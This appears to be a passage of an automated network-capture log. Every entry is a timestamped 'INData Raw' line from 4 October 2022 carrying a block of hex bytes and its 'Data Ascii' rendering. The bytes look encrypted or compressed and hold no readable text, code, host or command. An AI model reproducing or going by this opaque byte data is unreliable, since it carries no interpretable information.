                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6071INData Raw: 0b db 78 c4 91 53 9f 7f aa 89 60 a0 f9 c2 41 2b 84 df 8f 7c 21 7a 17 17 4d f7 f6 c7 17 85 57 00 c2 e1 f5 7b 59 7e b4 a5 36 d5 e2 64 9f 1d dc 70 77 3f b3 71 ad c6 d0 7f 02 bd f9 7f e7 14 2f 41 b2 66 9d 93 00 10 27 26 a2 7f 4a e7 2d 07 44 b9 1c f8 ec 37 ee 01 ab d8 21 ee 5e 9d 32 00 5c ef a0 73 49 98 43 55 18 56 ff 91 ff 0d 36 f3 36 ba 88 50 bf 90 17 32 57 b7 e9 7e c9 16 ac 44 99 18 87 78 e4 72 9e be ce 8e 88 d8 21 32 c4 b6 c0 bb 78 6e d4 5e c0 b7 04 fb 2c 76 de 33 aa c3 48 cd fd 43 b9 38 50 fb 61 c5 8a a0 f4 c9 dd 2e 24 8c 24 f7 75 4b 77 67 fb 2f 20 35 52 ad a1 7a c9 40 c0 79 2b de 6f 63 fb 8c cf e6 d3 71 a4 fb e9 ad 24 12 16 e3 cf 0e 77 1c a5 f0 62 04 64 2b 03 5e 4e b5 42 6c b7 d7 94 71 9d 3e 61 74 38 47 58 56 57 d1 41 e7 a2 c3 e8 b6 8a ec 6f 19 6b 5d e3
                                                                                                                                                                                                                                    Data Ascii: xS`A+|!zMW{Y~6dpw?q/Af'&J-D7!^2\sICUV66P2W~Dxr!2xn^,v3HC8Pa.$$uKwg/ 5Rz@y+ocq$wbd+^NBlq>at8GXVWAok]
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6087INData Raw: 35 7a 7a d3 7a 8d 41 62 c0 b0 45 26 a9 4f 46 0c e3 eb 7e 88 86 d1 e0 33 c6 fb 83 14 07 09 1d 3d 05 c9 8b 0a 9b e9 7c 8a 33 ce 6d 86 a0 e2 ad fd 5c be ee 36 b4 3b f2 ae ea d9 cd 53 23 56 64 a1 de 2d f3 8b 89 45 00 e5 6b d6 0c cc f6 eb be cb 7e 77 69 64 09 64 26 e9 65 cb a7 f3 bc 46 b4 91 27 80 94 d5 9c e1 1f 50 1d 52 c3 91 ff b9 c2 c1 87 1a 11 c9 ee 6a 34 48 21 c8 75 93 54 05 f7 2f 27 f4 0f 59 e2 ea d6 e6 a7 45 77 06 a5 ae 62 e9 11 8e 29 22 94 97 db ca a2 4c 17 76 bc 3e 12 86 3f 6a 89 71 c1 a6 03 55 36 88 0d 8a 5f 1b 26 38 25 cd 73 88 08 45 32 cc c0 e5 f5 03 38 49 4f 45 45 ff 05 9a 42 80 b9 81 89 f5 9a f6 1b 9b c4 6c 46 57 e9 f8 a2 63 37 6f cb f0 a4 d1 d7 94 e5 8c 0c c5 87 97 71 9d 8b 2d 99 78 fd 11 a8 3e ac 12 1a b8 cf d5 2c 7f 22 0e a8 fb 06 43 37 27 ed
                                                                                                                                                                                                                                    Data Ascii: 5zzzAbE&OF~3=|3m\6;S#Vd-Ek~widd&eF'PRj4H!uT/'YEwb)"Lv>?jqU6_&8%sE28IOEEBlFWc7oq-x>,"C7'
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6103INData Raw: 1b b0 93 09 73 b9 9e 25 f6 85 f7 e0 a9 b2 3c e9 d4 b9 f6 a9 03 c8 64 54 de f9 ee 92 1a ff 81 35 30 08 e8 27 c7 22 81 71 43 75 7d 29 7d 57 64 3b 0f b8 e9 71 83 0e 92 80 6d e2 24 aa 98 03 94 2b 4d b5 74 e9 eb 9a 94 5f 9b 48 d1 43 06 c4 39 77 f3 ba b7 75 06 b6 2c 54 19 2b f1 2c 34 75 99 60 86 3a 9a 17 90 fe 55 b9 da 3d 9f 03 93 6a ac ce bb 48 a8 ed a7 b6 a6 d5 be 56 69 f7 d2 5d 7c c9 95 65 7f b3 27 2e d2 ac 08 00 fc 14 c5 0d 9b a8 28 8a c2 bf cf e8 72 f8 d6 f9 84 28 00 fe 31 5b 93 4e d2 bd 93 13 9b f5 87 62 76 ee cb 0a 28 fe bd b1 9f b5 d2 a9 ac 31 50 84 98 2d 30 87 9f 3d 01 1e a6 de a3 e8 aa 7d 03 ca 67 f0 53 6e 1b 15 06 49 b0 a1 71 00 3a 40 dc da e1 80 c8 cf 07 5d 37 66 47 21 ef f8 2e 39 36 b1 7b b3 84 76 45 6c bd 89 9a 0b 0a 45 da ea d3 76 a5 c5 d6 a5 1a
                                                                                                                                                                                                                                    Data Ascii: s%<dT50'"qCu})}Wd;qm$+Mt_HC9wu,T+,4u`:U=jHVi]|e'.(r(1[Nbv(1P-0=}gSnIq:@]7fG!.96{vElEv
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6119INData Raw: 7f 0d 92 8c f0 aa 61 44 a6 c1 4d b6 22 38 11 92 4f b2 9a 2d 6c 4d 5a 40 e2 34 1a 6a fb 01 56 6b b2 81 ed ec 4b 58 24 26 8f 87 ce 59 82 b0 e1 97 d0 d2 b5 8e 9d ff a3 89 15 ac f4 40 1e 86 8e 97 df 72 d1 5f 39 ae ad 17 82 09 bf 9c 51 af 54 29 61 a4 1e a3 de ed 5d d1 b3 a1 49 7e c1 77 b5 ea ea 32 19 f1 3b 34 3d dc 52 de 57 73 59 ed 0f af d5 83 ec 9d de 92 34 f8 a0 ab 66 4d 0b 78 b9 93 83 11 ee 72 57 44 59 ca 1f 63 14 d4 a8 f2 79 dc 3f d6 5b e7 34 17 6b c3 d9 23 d2 31 98 bf 71 ca f2 7e c5 3c 24 8c 98 98 2d 8c e8 b5 cb 2a d7 4f fc 1f 4e 79 b6 ad 6f 76 20 38 41 16 f0 2c 15 e6 87 8b b8 4d 51 f6 96 8b 81 00 c6 b7 d6 22 67 ae 93 bf c6 de 2b 31 43 cb 77 7e 86 68 61 73 cf bf 01 df 93 44 20 5b e0 e9 86 fa 23 8d a1 50 bf 6e 05 71 48 27 b0 9a a4 a1 70 d9 2b 6c 00 e6 3c
                                                                                                                                                                                                                                    Data Ascii: aDM"8O-lMZ@4jVkKX$&Y@r_9QT)a]I~w2;4=RWsY4fMxrWDYcy?[4k#1q~<$-*ONyov 8A,MQ"g+1Cw~hasD [#PnqH'p+l<
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6135INData Raw: cc 5e 1f 18 b2 93 c3 68 37 40 3f b0 16 e6 74 bd 34 cd 65 54 95 97 10 14 7f 2b 99 40 33 43 2f ef 1a 4f 7c 2b 54 d3 b4 29 f5 5a b1 a3 58 8b b1 c3 99 1d 9a a6 28 65 c7 07 c7 00 10 b3 46 9a 50 48 ec 2a d1 b3 ad e1 f4 58 d9 2a 30 71 fc 9e 1f 75 22 0f 5f e1 b1 1e 0e 6e 97 d2 45 22 82 7c ae 4e 75 22 21 14 b9 38 a5 1e e4 47 47 bb ce 14 64 d3 fb 7d 1c 00 d2 78 de 10 79 72 82 6c a0 19 3d 2a e3 3f b1 c3 38 ac 11 4a 5d 17 e2 81 a2 05 21 29 c5 9b 84 89 fa 6d 07 63 91 2e 74 32 b3 83 28 15 4a 74 f4 05 0b f3 53 7a e7 08 da 98 a3 41 f0 da fb c8 53 18 84 01 5e 42 c4 64 3b 31 0f d1 00 1f 26 30 e9 86 0e cb bd 24 5d 18 d6 df 7a 01 23 01 b2 30 7e 95 3f 54 0a 4f 5f 29 6d db 51 13 92 3e 15 68 73 73 7a 5e 2c 6c 13 39 5d 5a 9f a1 63 2c e9 a9 6c 93 14 7f 16 df 9a 4d 2e fe 9c b0 6f
                                                                                                                                                                                                                                    Data Ascii: ^h7@?t4eT+@3C/O|+T)ZX(eFPH*X*0qu"_nE"|Nu"!8GGd}xyrl=*?8J]!)mc.t2(JtSzAS^Bd;1&0$]z#0~?TO_)mQ>hssz^,l9]Zc,lM.o
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6151INData Raw: 4f e9 95 42 c8 fb bb 37 f3 5d e0 83 4b 4d c9 0d e4 cc 47 e1 0a 66 a9 78 d6 ae 2d 3e 39 2d f4 63 7e 5e 33 1d e2 cb 5a a5 c2 72 c4 ae 6e cf 12 80 82 b0 dc 55 93 c9 1d 53 82 3b d0 0d 1a 1f 98 79 3a 90 75 ae c6 a1 79 c0 93 b0 c2 a6 da 32 70 de dc 7a df 42 89 0d a8 a2 4e d0 ab d6 aa b4 1a ef 6c 26 2d da c0 41 3a b0 2a f5 d3 86 04 83 f7 e1 96 f7 21 bb f0 c3 72 92 67 de 1b 3f 48 af 0f 6a ec 31 2f 2f 8f f0 e2 a8 c8 88 aa eb 15 8a b7 8f 63 0b f1 1e 28 80 74 74 66 93 46 31 31 e0 c8 3a 4b 78 97 11 1b 0b 74 55 64 61 19 c8 6d 66 d5 89 e0 cb ff 62 a6 c3 0f 7d 82 a5 27 1c c7 63 41 ce 82 81 fe 4b 8f 76 93 8e 9e 95 94 4a 28 ba d2 85 f4 07 b3 c1 58 61 c5 b9 5c f2 65 18 e5 20 48 b2 aa 1c fd a8 6c ae 54 10 f6 4d e2 09 c2 f3 17 14 86 42 7c ac b2 6f c8 97 81 80 91 20 4b 83 e6
                                                                                                                                                                                                                                    Data Ascii: OB7]KMGfx->9-c~^3ZrnUS;y:uy2pzBNl&-A:*!rg?Hj1//c(ttfF11:KxtUdamfb}'cAKvJ(Xa\e HlTMB|o K
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6167INData Raw: 1f 84 37 a0 42 06 02 ad 7a 14 43 ad 56 ac d4 c0 4a f8 38 6a 7e dd 1e 64 4c a9 87 25 a2 55 b4 23 a0 c0 29 ee 69 99 7f 12 cc 20 d6 14 00 44 75 ac bc 4e 6b 7f 4d 97 3c d4 6b 1a 31 42 13 a7 14 c4 84 53 4f 23 00 a2 99 04 dc 3d 15 21 15 9c 8e 6d 28 75 76 ca 08 a0 ad 0a 3b c7 6a b9 49 f4 84 3a d7 6a 4c ec d3 bc ba fa 13 65 b2 7c d4 26 57 4a cc 42 ad 35 52 e4 71 6c 9d df b8 f3 c4 55 a4 42 8a 60 c7 51 e4 ac 8c 80 5b dd a8 b6 0d a9 d6 d1 e2 37 b8 a8 a0 6b 7d e7 4d f6 d7 de 68 af 16 db f6 7a 05 1a 2c 09 48 0c f2 77 1d 16 ce 50 42 09 09 fd 49 71 3d bc 4a be c0 31 4d 85 fc 4f f3 f8 7b 53 0c 24 eb 90 91 a7 ae e9 7f 49 15 ef 27 2f 9c 48 5a f3 a5 19 0d c6 67 92 bd 9a 2b 19 e6 da 55 db f1 c5 f9 58 d9 33 38 5b 7f d2 00 f9 b2 b2 fe 8a 3f 57 55 e7 34 60 88 76 fd e2 51 4e 60
                                                                                                                                                                                                                                    Data Ascii: 7BzCVJ8j~dL%U#)i DuNkM<k1BSO#=!m(uv;jI:jLe|&WJB5RqlUB`Q[7k}Mhz,HwPBIq=J1MO{S$I'/HZg+UX38[?WU4`vQN`
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6183INData Raw: f5 4b b6 f3 99 0a b9 de 81 f7 33 d6 69 d7 ad 4f 06 b1 c8 7b a7 2f 31 9d 12 8d db f6 eb ef 1e d6 4c ce fd ce 3b 5e 88 2c 3b 5e 67 45 82 18 93 ea 9c f7 27 21 25 e6 5b 0c 0c d7 a8 06 96 55 a3 ea 09 19 fd 3e 31 fd db ef ec 0c 68 4e 36 7f 74 95 55 48 d6 9b e8 73 bc 54 7a 52 7f 56 19 ae ab dd d8 e4 ff fc 7b 87 da 96 82 e9 7f aa 66 6c 07 7f 30 90 bb b7 ca 14 d8 2e 45 8f 17 41 f5 b1 0a 81 ff 5e 61 42 f2 ae a3 8d ac 48 9c 34 09 d1 71 3e 00 b5 fe 25 be d9 b1 e4 74 0a 80 06 b2 5a 4b ed b8 3b b6 6f b5 f3 86 31 ef fa 7d b0 56 82 b8 dd 56 5a 7d 41 ee 25 df 4c 39 44 2e 44 73 60 c7 a0 55 b0 16 db 7b 25 49 d8 8d e9 20 a2 ec 65 3b 27 85 34 56 49 1b 4f 3f db 6d f0 c5 e5 3a 1f c9 a8 f4 80 b3 64 ae 36 d2 23 56 55 a7 6f 5d 12 eb bb fe e0 57 9c 59 28 1e 85 ad 9a 4f 48 be 9f f8
                                                                                                                                                                                                                                    Data Ascii: K3iO{/1L;^,;^gE'!%[U>1hN6tUHsTzRV{fl0.EA^aBH4q>%tZK;o1}VVZ}A%L9D.Ds`U{%I e;'4VIO?m:d6#VUo]WY(OH
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6199INData Raw: d6 6c cd 06 3f 99 30 d2 6a 73 8f ec 88 34 c4 e8 fb 75 be 0d 4b 28 ae 5e a0 80 47 cf ca b9 44 5e 14 e2 e2 ae 57 08 db 74 2d 86 30 b2 1f 86 4d a1 ce f7 37 37 04 e9 6f 0f 5b d7 3a 18 37 c7 ac eb 7f 75 f3 ca 55 19 76 cf 44 f6 1a 8a 69 40 1c c6 28 f5 2d 22 79 2a c6 58 84 13 dc 69 40 2c 60 ac 90 f4 74 9b 4d c9 64 cc d7 fe fc ca 91 d1 00 60 e3 10 78 cd ca 7e 5c d4 ff 8f 4a ee 56 4f 5d 01 ba 9f 69 e2 6f 5d 70 9d 9d 19 cf 2c 9f 8c 22 cd 47 c4 f8 08 ce 40 83 0a 5b 34 6d 50 8e e8 e1 95 12 b1 63 11 e2 cd 17 be f6 61 99 8f de b8 dc 95 51 6a 7e dc bf 7c 76 a7 13 48 67 8e b8 07 ae d8 95 af 1a 91 2f 63 25 98 9b 80 91 f4 9c 6c 4e cb ea a7 ac 67 e5 31 6a ea 97 c9 86 7e 7d db ee 9a b6 c2 c4 01 e0 97 e5 ed 5c ef 8d 05 a2 03 4c 3e 68 66 70 d3 27 aa ed f0 fe a1 6e 5f c9 aa f1
                                                                                                                                                                                                                                    Data Ascii: l?0js4uK(^GD^Wt-0M77o[:7uUvDi@(-"y*Xi@,`tMd`x~\JVO]io]p,"G@[4mPcaQj~|vHg/c%lNg1j~}\L>hfp'n_
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6215INData Raw: 45 eb 46 6a 91 7f a4 9a 31 92 6c e7 98 44 3d e2 3a 19 cf 9a c6 98 50 67 b2 2a ce b6 e9 c7 fb 77 0b 05 79 06 c2 70 fc d3 4a 37 e4 0c 01 9a a5 08 58 e5 47 60 bf f2 82 06 4e e2 83 9e 75 f4 55 8a bc 6e 39 11 0b 73 bb 0d df b9 14 ad a6 dd bd 73 db 5f 68 06 1a 1c c2 3f 77 50 cf 44 3d 5e e2 b4 97 24 a7 05 b0 69 bb cb 22 e0 00 11 4f f4 8b 8f 86 0d 8f b9 35 7f 4e e4 93 c6 29 44 5e 5b 24 f6 54 f5 03 31 be c9 3d 93 d0 5a 55 18 ea 30 bc 79 c1 d0 5b 7e 58 ed 02 3f 0d e7 9b 67 7b ee 1d 00 52 df 40 26 42 02 ec be 78 e9 d0 f4 d7 21 88 a0 e7 4d 1a 47 79 b0 ca 28 22 1d 14 9f d3 80 33 b7 33 12 55 8b 9f 15 cc b2 fa ff 04 b6 ce 49 73 e8 d2 f5 57 05 63 9c e1 73 5e 50 1a 5a 97 36 20 d7 f4 f1 6e f6 5c e0 2e e9 85 1a 57 02 61 07 86 8d cc 03 13 9f 9f 72 e9 0d 11 49 0b 79 94 67 68
                                                                                                                                                                                                                                    Data Ascii: EFj1lD=:Pg*wypJ7XG`NuUn9ss_h?wPD=^$i"O5N)D^[$T1=ZU0y[~X?g{R@&Bx!MGy("33UIsWcs^PZ6 n\.WarIygh
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6231INData Raw: a1 4f 56 39 33 43 3b c7 22 41 af cb df 26 66 31 a3 4f 16 b2 a9 84 ad 45 70 73 4c af f8 8a a8 bc 46 5d 7f 9c f4 28 08 e3 60 cf 0f a1 dd 31 ca a7 36 46 5f 3a 2c 14 ca 52 18 40 2a 6c 43 20 21 71 29 c4 05 9f f8 c7 47 86 8c b6 51 35 02 1a f5 24 70 77 aa 84 20 f2 f9 0b 3c 8d 6d e7 fb c9 ec b6 da 54 6e af 63 52 65 b5 47 bc 19 4a 1a 19 b4 bf 65 33 80 64 e3 67 6d 51 15 14 2f 5c e5 24 f9 77 c3 62 e3 24 81 ab 44 98 32 af dc 54 be e1 34 68 56 6c ed 47 d7 16 77 b6 ce 61 44 db 17 2f 00 13 51 9f 97 60 d9 90 ba 6d 50 b6 84 6b e7 d8 b0 7c ee 2d 6f c4 9f 3c de 30 30 8c de e4 3b 88 60 cd 23 8c 49 7b 0a 11 a6 d6 1c 83 18 ea 37 27 16 c0 50 68 52 f1 b9 da 67 c1 78 51 b6 36 4e c2 6f fe 4b 4f d8 6f bb 67 60 1c 6e 62 2a f2 cd b7 87 7c 5b b0 a7 fb 14 6d 23 77 c7 6e 48 5f f9 a3 f8
                                                                                                                                                                                                                                    Data Ascii: OV93C;"A&f1OEpsLF](`16F_:,R@*lC !q)GQ5$pw <mTncReGJe3dgmQ/\$wb$D2T4hVlGwaD/Q`mPk|-o<00;`#I{7'PhRgxQ6NoKOog`nb*|[m#wnH_
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6247INData Raw: 03 33 b1 e2 b5 ac 21 3c 43 1f 7b c3 c6 48 fb f8 e6 ca 30 fc db c0 dc ea 7d f8 e0 c8 01 80 5e 1e cb 46 b4 a4 b8 13 cc b9 26 13 aa c9 bd 37 ad 05 9c be 42 b8 d7 bd 7d 24 af 7f bd 1e e9 df e7 eb 44 3a e4 3c f4 5a 92 cd 5c 83 d0 f8 e1 fb 05 84 1d f3 d9 85 84 bb 73 66 dd 27 5c e0 9b 20 f6 09 b0 94 99 fe 5b 36 f6 bf 56 7c 6f 9e ff ef 3c 6f fe e8 70 01 21 e0 41 db db 71 5e 98 22 bc 7b 26 9b 89 ac e1 5f 06 13 91 4e 96 eb 62 a8 0f e2 57 61 66 08 9f e9 65 69 21 64 19 85 24 ef 3c d8 4d 04 d4 93 51 39 d3 1a e7 d4 d2 60 b5 bc f0 76 e0 7c b0 f6 23 d0 cf a6 95 71 05 65 48 1b 38 c3 b2 43 40 64 bd 72 4e 7c 95 dd 02 60 82 e2 42 f5 ae 5a 44 f0 d1 60 ef 4f ac 6b f5 a6 70 56 ce 60 4c 5b e1 85 49 5a b5 1c dc c0 e4 76 46 27 c8 1d 13 52 8d 50 20 1a 1b 99 f3 e8 bf f6 3e 98 27 cd
                                                                                                                                                                                                                                    Data Ascii: 3!<C{H0}^F&7B}$D:<Z\sf'\ [6V|o<op!Aq^"{&_NbWafei!d$<MQ9`v|#qeH8C@drN|`BZD`OkpV`L[IZvF'RP >'
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6263INData Raw: dd e4 2d c1 fd d6 c0 d2 ff 75 41 da a0 7e ed 75 23 46 b2 3b 1c 44 c6 8b 01 43 a8 ee f0 e6 ab 29 80 b0 5c 88 7c 2b e9 8e 10 c8 8c ed 59 ca 20 08 72 98 b8 59 8b 73 32 44 77 2a 76 19 f7 de d4 f8 1f dd 81 37 a9 6b 4f cb 44 1f f4 c3 30 32 25 1d be 76 2a 32 a3 61 68 73 c6 c7 a3 8b 41 40 5f 38 1b 24 c3 47 f8 d3 7d 7a 0c 08 bf 92 4d fc f6 4f c9 5d e0 b0 ce f6 7b d4 35 02 96 1d 43 95 ea 98 80 01 7f f0 b2 8f 47 bd 41 04 48 dc c6 d6 85 70 8e 7f d8 14 72 59 5f 80 13 23 2b d4 6e 1a 23 37 6c ff 1e 7c f2 00 f2 f0 df 78 46 82 27 8b c3 50 be 86 2a 05 b4 0c b4 18 a0 64 57 d1 fc 79 c3 03 b1 d9 61 e3 bf 73 06 94 9c 91 c1 53 9b 1d 27 95 2f 3b 44 29 c8 dd 71 28 39 e7 60 25 4f 65 e5 4c 31 d0 75 ab c9 19 ec 0d 29 44 70 8f 26 dd be 6d ba 20 8d 04 b8 f4 45 ab e7 54 45 3a 74 03 fe
                                                                                                                                                                                                                                    Data Ascii: -uA~u#F;DC)\|+Y rYs2Dw*v7kOD02%v*2ahsA@_8$G}zMO]{5CGAHprY_#+n#7l|xF'P*dWyasS'/;D)q(9`%OeL1u)Dp&m ETE:t
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6279INData Raw: ea 3e 32 0b e8 54 7e 9a 40 18 01 c6 0f f0 04 b2 54 da 62 1e c0 08 5f fd 99 a3 f2 41 59 c4 5a 5f ad f0 99 bc ae e7 fd 78 2a 27 2b 8c e9 8e fc 7c 54 f0 cd f8 4f 4f f6 c9 be 76 8b 04 29 95 a0 74 d0 04 be 1b 64 f7 90 4a e4 18 a8 70 98 4f 13 1f 80 ce 7d d6 09 92 12 f6 ce b1 22 24 a5 e7 7f b7 a6 ea af 7a c2 6f cf 76 3e cc de e7 6c d7 5b 55 1f 2e 54 76 2a 0c f2 fc 28 8e d4 66 f9 5a 0e 60 18 8f 65 9f 9e 64 84 aa 6a 18 99 6d 74 a5 53 b8 73 b3 bc 1b a2 16 00 9c b9 cd a6 a1 2c d3 92 f8 5e 0e 5f 18 6b bb 84 74 fe 34 29 ad cc 6a 8d d5 f8 6e db 10 b3 03 39 8c d3 25 ad a0 90 f4 a2 61 46 6e cf c4 33 e1 dc ea 2c ca 24 ce 1d cf 6f 2a 1e 0f c5 9c d9 cb 34 c8 8b 1f 80 85 32 9e 33 9e 2e e6 d8 e9 52 ff f7 75 02 49 65 ad c9 0e 36 76 33 7e 14 0a 20 47 3a 9d c0 89 d3 19 14 2f 8f
                                                                                                                                                                                                                                    Data Ascii: >2T~@Tb_AYZ_x*'+|TOOv)tdJpO}"$zov>l[U.Tv*(fZ`edjmtSs,^_kt4)jn9%aFn3,$o*423.RuIe6v3~ G:/
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6295INData Raw: f6 40 03 a8 e2 7d 69 9f 61 3a fc 08 61 a2 e4 8a 06 7a 44 f3 8e b5 aa 9e 09 cb 32 f5 7b fa e7 ac 2c 9b 5f 5a db 76 e1 a8 79 18 c4 ee ea 9c 66 72 ca 1f ce f7 5c 80 37 7a 3c 49 0e 55 9f a8 3a 22 2d 96 40 85 3e ad d4 a8 74 42 49 d8 74 29 c4 f5 4d 4a f7 65 5f bb de c3 05 17 41 f8 de 48 7d 7f 24 60 a4 40 95 a5 73 c1 00 7c b8 90 48 d5 68 4e ac 36 92 41 1a 7c a5 78 89 8c 77 8f b2 a5 ca 0d 15 eb 86 c2 7c 90 65 3c 31 93 51 f8 b8 f8 ba ee af 9e 27 d8 f0 3d 7d bf f4 c1 78 e8 41 a3 6d 62 ff 80 f3 8f 03 54 53 18 c3 f8 d4 83 af b8 4a df 0f 1f 07 62 14 03 87 82 f7 b0 fd 38 9e 4c 45 e0 bc 04 b9 3c ec 12 65 9e 92 60 1b f4 bc 05 bc ad 3c 7e af a2 1d 5c d6 90 46 4e b6 be 95 0d ae 21 37 7f 7b f3 e9 13 c5 52 2d 39 2c d0 b1 d0 39 76 4b ae 69 7f 86 f9 b1 4b f0 f7 2c 83 e6 48 da
                                                                                                                                                                                                                                    Data Ascii: @}ia:azD2{,_Zvyfr\7z<IU:"-@>tBIt)MJe_AH}$`@s|HhN6A|xw|e<1Q'=}xAmbTSJb8LE<e`<~\FN!7{R-9,9vKiK,H
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6311INData Raw: 57 d4 3b 50 f3 ed 79 60 f2 fc 62 22 b4 69 61 e8 73 66 e1 9a ad 43 3b de 5b a4 7e 19 29 ce f5 b6 ed d8 27 09 5b 2f ba a6 2b 97 b9 fa 55 68 81 61 42 e1 b5 96 6d 2c f2 2e 44 9f ed 7b ef 54 29 13 ab 62 e7 c0 24 ce c9 07 8d 6d 1a a7 04 dd e3 57 81 3c 84 e7 a6 fe f6 5c 03 07 61 61 2a 48 1f ea cc 36 17 dd b0 39 f1 2f 42 d5 d2 9c d5 fa 7c 72 86 d3 81 12 c6 0e 6a f2 af ed fd ba a0 73 a6 59 d5 67 4b 81 49 52 f3 b9 bc 12 08 ca 70 6f f0 83 fe 0a cd 40 88 dd 3e db a2 fc 1f 69 76 57 7d e7 ad 22 bc e1 3b f7 99 b9 9f 5f c9 4f 45 34 c0 c3 a6 0f 50 b5 ee b8 ea 16 23 ec 10 6b 76 a0 9a 2f 96 d7 ff 76 32 7c e9 3a 0b d6 31 2e 87 32 44 ea 54 65 24 65 7a ff da 9e b5 52 9f 81 29 5d 29 ef 15 82 29 14 9d d5 30 bf 8a 3d 02 3a d8 26 02 0c e3 1a b6 cb 6d ab e8 bb 40 74 46 b6 92 1e 00
                                                                                                                                                                                                                                    Data Ascii: W;Py`b"iasfC;[~)'[/+UhaBm,.D{T)b$mW<\aa*H69/B|rjsYgKIRpo@>ivW}";_OE4P#kv/v2|:1.2DTe$ezR)]))0=:&m@tF
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6327INData Raw: 66 e5 84 dc a5 d3 dd 34 d1 af 41 7c 1f 6a 06 59 80 d6 6d 44 5b 32 86 9a 70 15 36 3c ac 5f e1 1a cf a7 6e 51 1d 23 f8 a9 f7 ef f9 58 ae 1b 73 c5 cd e8 c9 32 1b 22 f6 cb 7c 81 18 38 09 86 ae 29 6e e1 eb 43 78 16 34 a1 69 73 1d 8a 32 b8 7f 83 dd ab d2 9b 5d c4 db db df 70 83 bf 54 52 60 ce 65 07 fa ec fd b1 90 24 3b 25 1e 69 ff d8 04 3a c1 9e 3e 50 d0 5d b4 b8 c5 7b 4b cb 9b b1 66 72 c8 6d 64 45 33 eb 20 4b 7c 14 62 04 45 2d b4 c2 4e 46 c7 18 72 d7 cd f4 51 40 07 f0 80 a9 e9 ff 84 32 1a a5 85 12 7e ff 97 db 90 44 23 43 14 4e 2b 71 7a 8f 8d de cb 89 87 46 c7 b9 da e2 e6 be 9f 56 91 9f 26 4f 23 2e 70 d6 17 6a 14 03 e3 20 d1 00 8b 3d 9c 0f 02 20 02 ff 34 76 47 33 96 d5 e4 79 48 e9 1f 27 d3 89 f4 14 cd 47 58 22 2f 78 7c 34 c8 e8 5a c0 c5 c1 19 c5 95 6d 04 d5 b8
                                                                                                                                                                                                                                    Data Ascii: f4A|jYmD[2p6<_nQ#Xs2"|8)nCx4is2]pTR`e$;%i:>P]{KfrmdE3 K|bE-NFrQ@2~D#CN+qzFV&O#.pj = 4vG3yH'GX"/x|4Zm
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6343INData Raw: e8 07 23 41 34 55 c5 e9 54 26 3c 1f 66 7a 69 b0 1f 6b a2 29 f8 6e 89 8e af c3 f9 c7 c7 c5 32 f4 5a 27 1e 8a 5d 40 bf 8d 37 eb a6 14 34 d5 b0 b3 40 e7 b4 b3 44 52 d3 21 a7 7e 97 68 df 00 4f c2 ab b7 eb 77 ff 97 34 cf 7e 5d ae 44 a9 cd 44 04 79 8b b8 49 93 c1 36 b7 94 60 88 49 b3 e3 4c d9 01 7b 53 b4 07 17 24 80 f6 10 50 68 0b 52 a6 c0 4f 72 e0 6f 95 7b 1d 03 5a 63 ea d7 97 9a e4 29 91 00 b2 ab 3a ca bf a8 8c 72 89 ee 2d da e5 b6 d9 f0 01 50 57 f8 37 3d cb fd 43 e5 9f 9d 7a f0 86 85 98 42 33 d4 9b 77 dc b3 fb 21 53 08 a0 26 06 dd 7c 6f 00 2d 2d 35 ab 94 30 8f d8 e0 36 57 01 a8 33 9e 46 5d 9c 8c a3 5d 91 f5 51 fb 69 54 cc 0a 39 74 9a e0 b0 08 eb 99 ab 56 59 0f 1c 90 63 55 9b 23 4b ae 80 85 4e f6 9e d3 14 08 09 dc 26 df d1 fc 8b 90 3b 34 af f4 fc 53 c7 90 ee
                                                                                                                                                                                                                                    Data Ascii: #A4UT&<fzik)n2Z']@74@DR!~hOw4~]DDyI6`IL{S$PhROro{Zc):r-PW7=CzB3w!S&|o--506W3F]]QiT9tVYcU#KN&;4S
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6359INData Raw: 2f 82 d8 01 73 a3 9d bc 90 2c c6 bb fa c7 fe e3 d2 e7 73 c1 53 cb ce 3b fd 6e 77 6d d1 18 5e a0 4b dd 5f e5 09 8f ae 2d 4d b8 5a 46 b1 76 9f 62 70 b4 13 6d 14 25 54 81 43 fa 99 02 77 d1 cd de fe a7 f3 19 be b7 9e 66 e9 01 f0 12 b3 29 e9 e8 1a 03 61 28 02 72 89 ad ae 6e e5 2e 7e 6f 9a b7 d0 dd cd 83 67 91 5f b6 06 93 c8 6b 95 e3 dd 0c 76 8b e5 03 e7 7a dd 91 b7 6b 85 7c f2 e4 c4 5d 70 3f 7d e8 17 2d 04 79 2c f1 d4 44 ed bf ab fb 1f 74 e5 e7 63 ac cc 15 d9 34 5c ff 7e f2 3f fd ae e2 2f a6 f4 ac 8f 88 f4 45 7a be 0e 0b 65 be 18 0c e7 8a 96 f1 24 8a 8a db 1b 56 00 87 26 37 98 c7 7f d5 a2 d3 07 37 e7 1c 87 79 10 1b b0 51 c2 20 16 7e 48 01 5c 90 38 23 a0 94 1c b1 4b 84 a5 1e 26 e9 2e 49 4b 63 c2 3f 55 31 29 00 33 05 1d 81 85 6c 21 83 8a 0d 38 0b 71 04 70 47 6b
                                                                                                                                                                                                                                    Data Ascii: /s,sS;nwm^K_-MZFvbpm%TCwf)a(rn.~og_kvzk|]p?}-y,Dtc4\~?/Eze$V&77yQ ~H\8#K&.IKc?U1)3l!8qpGk
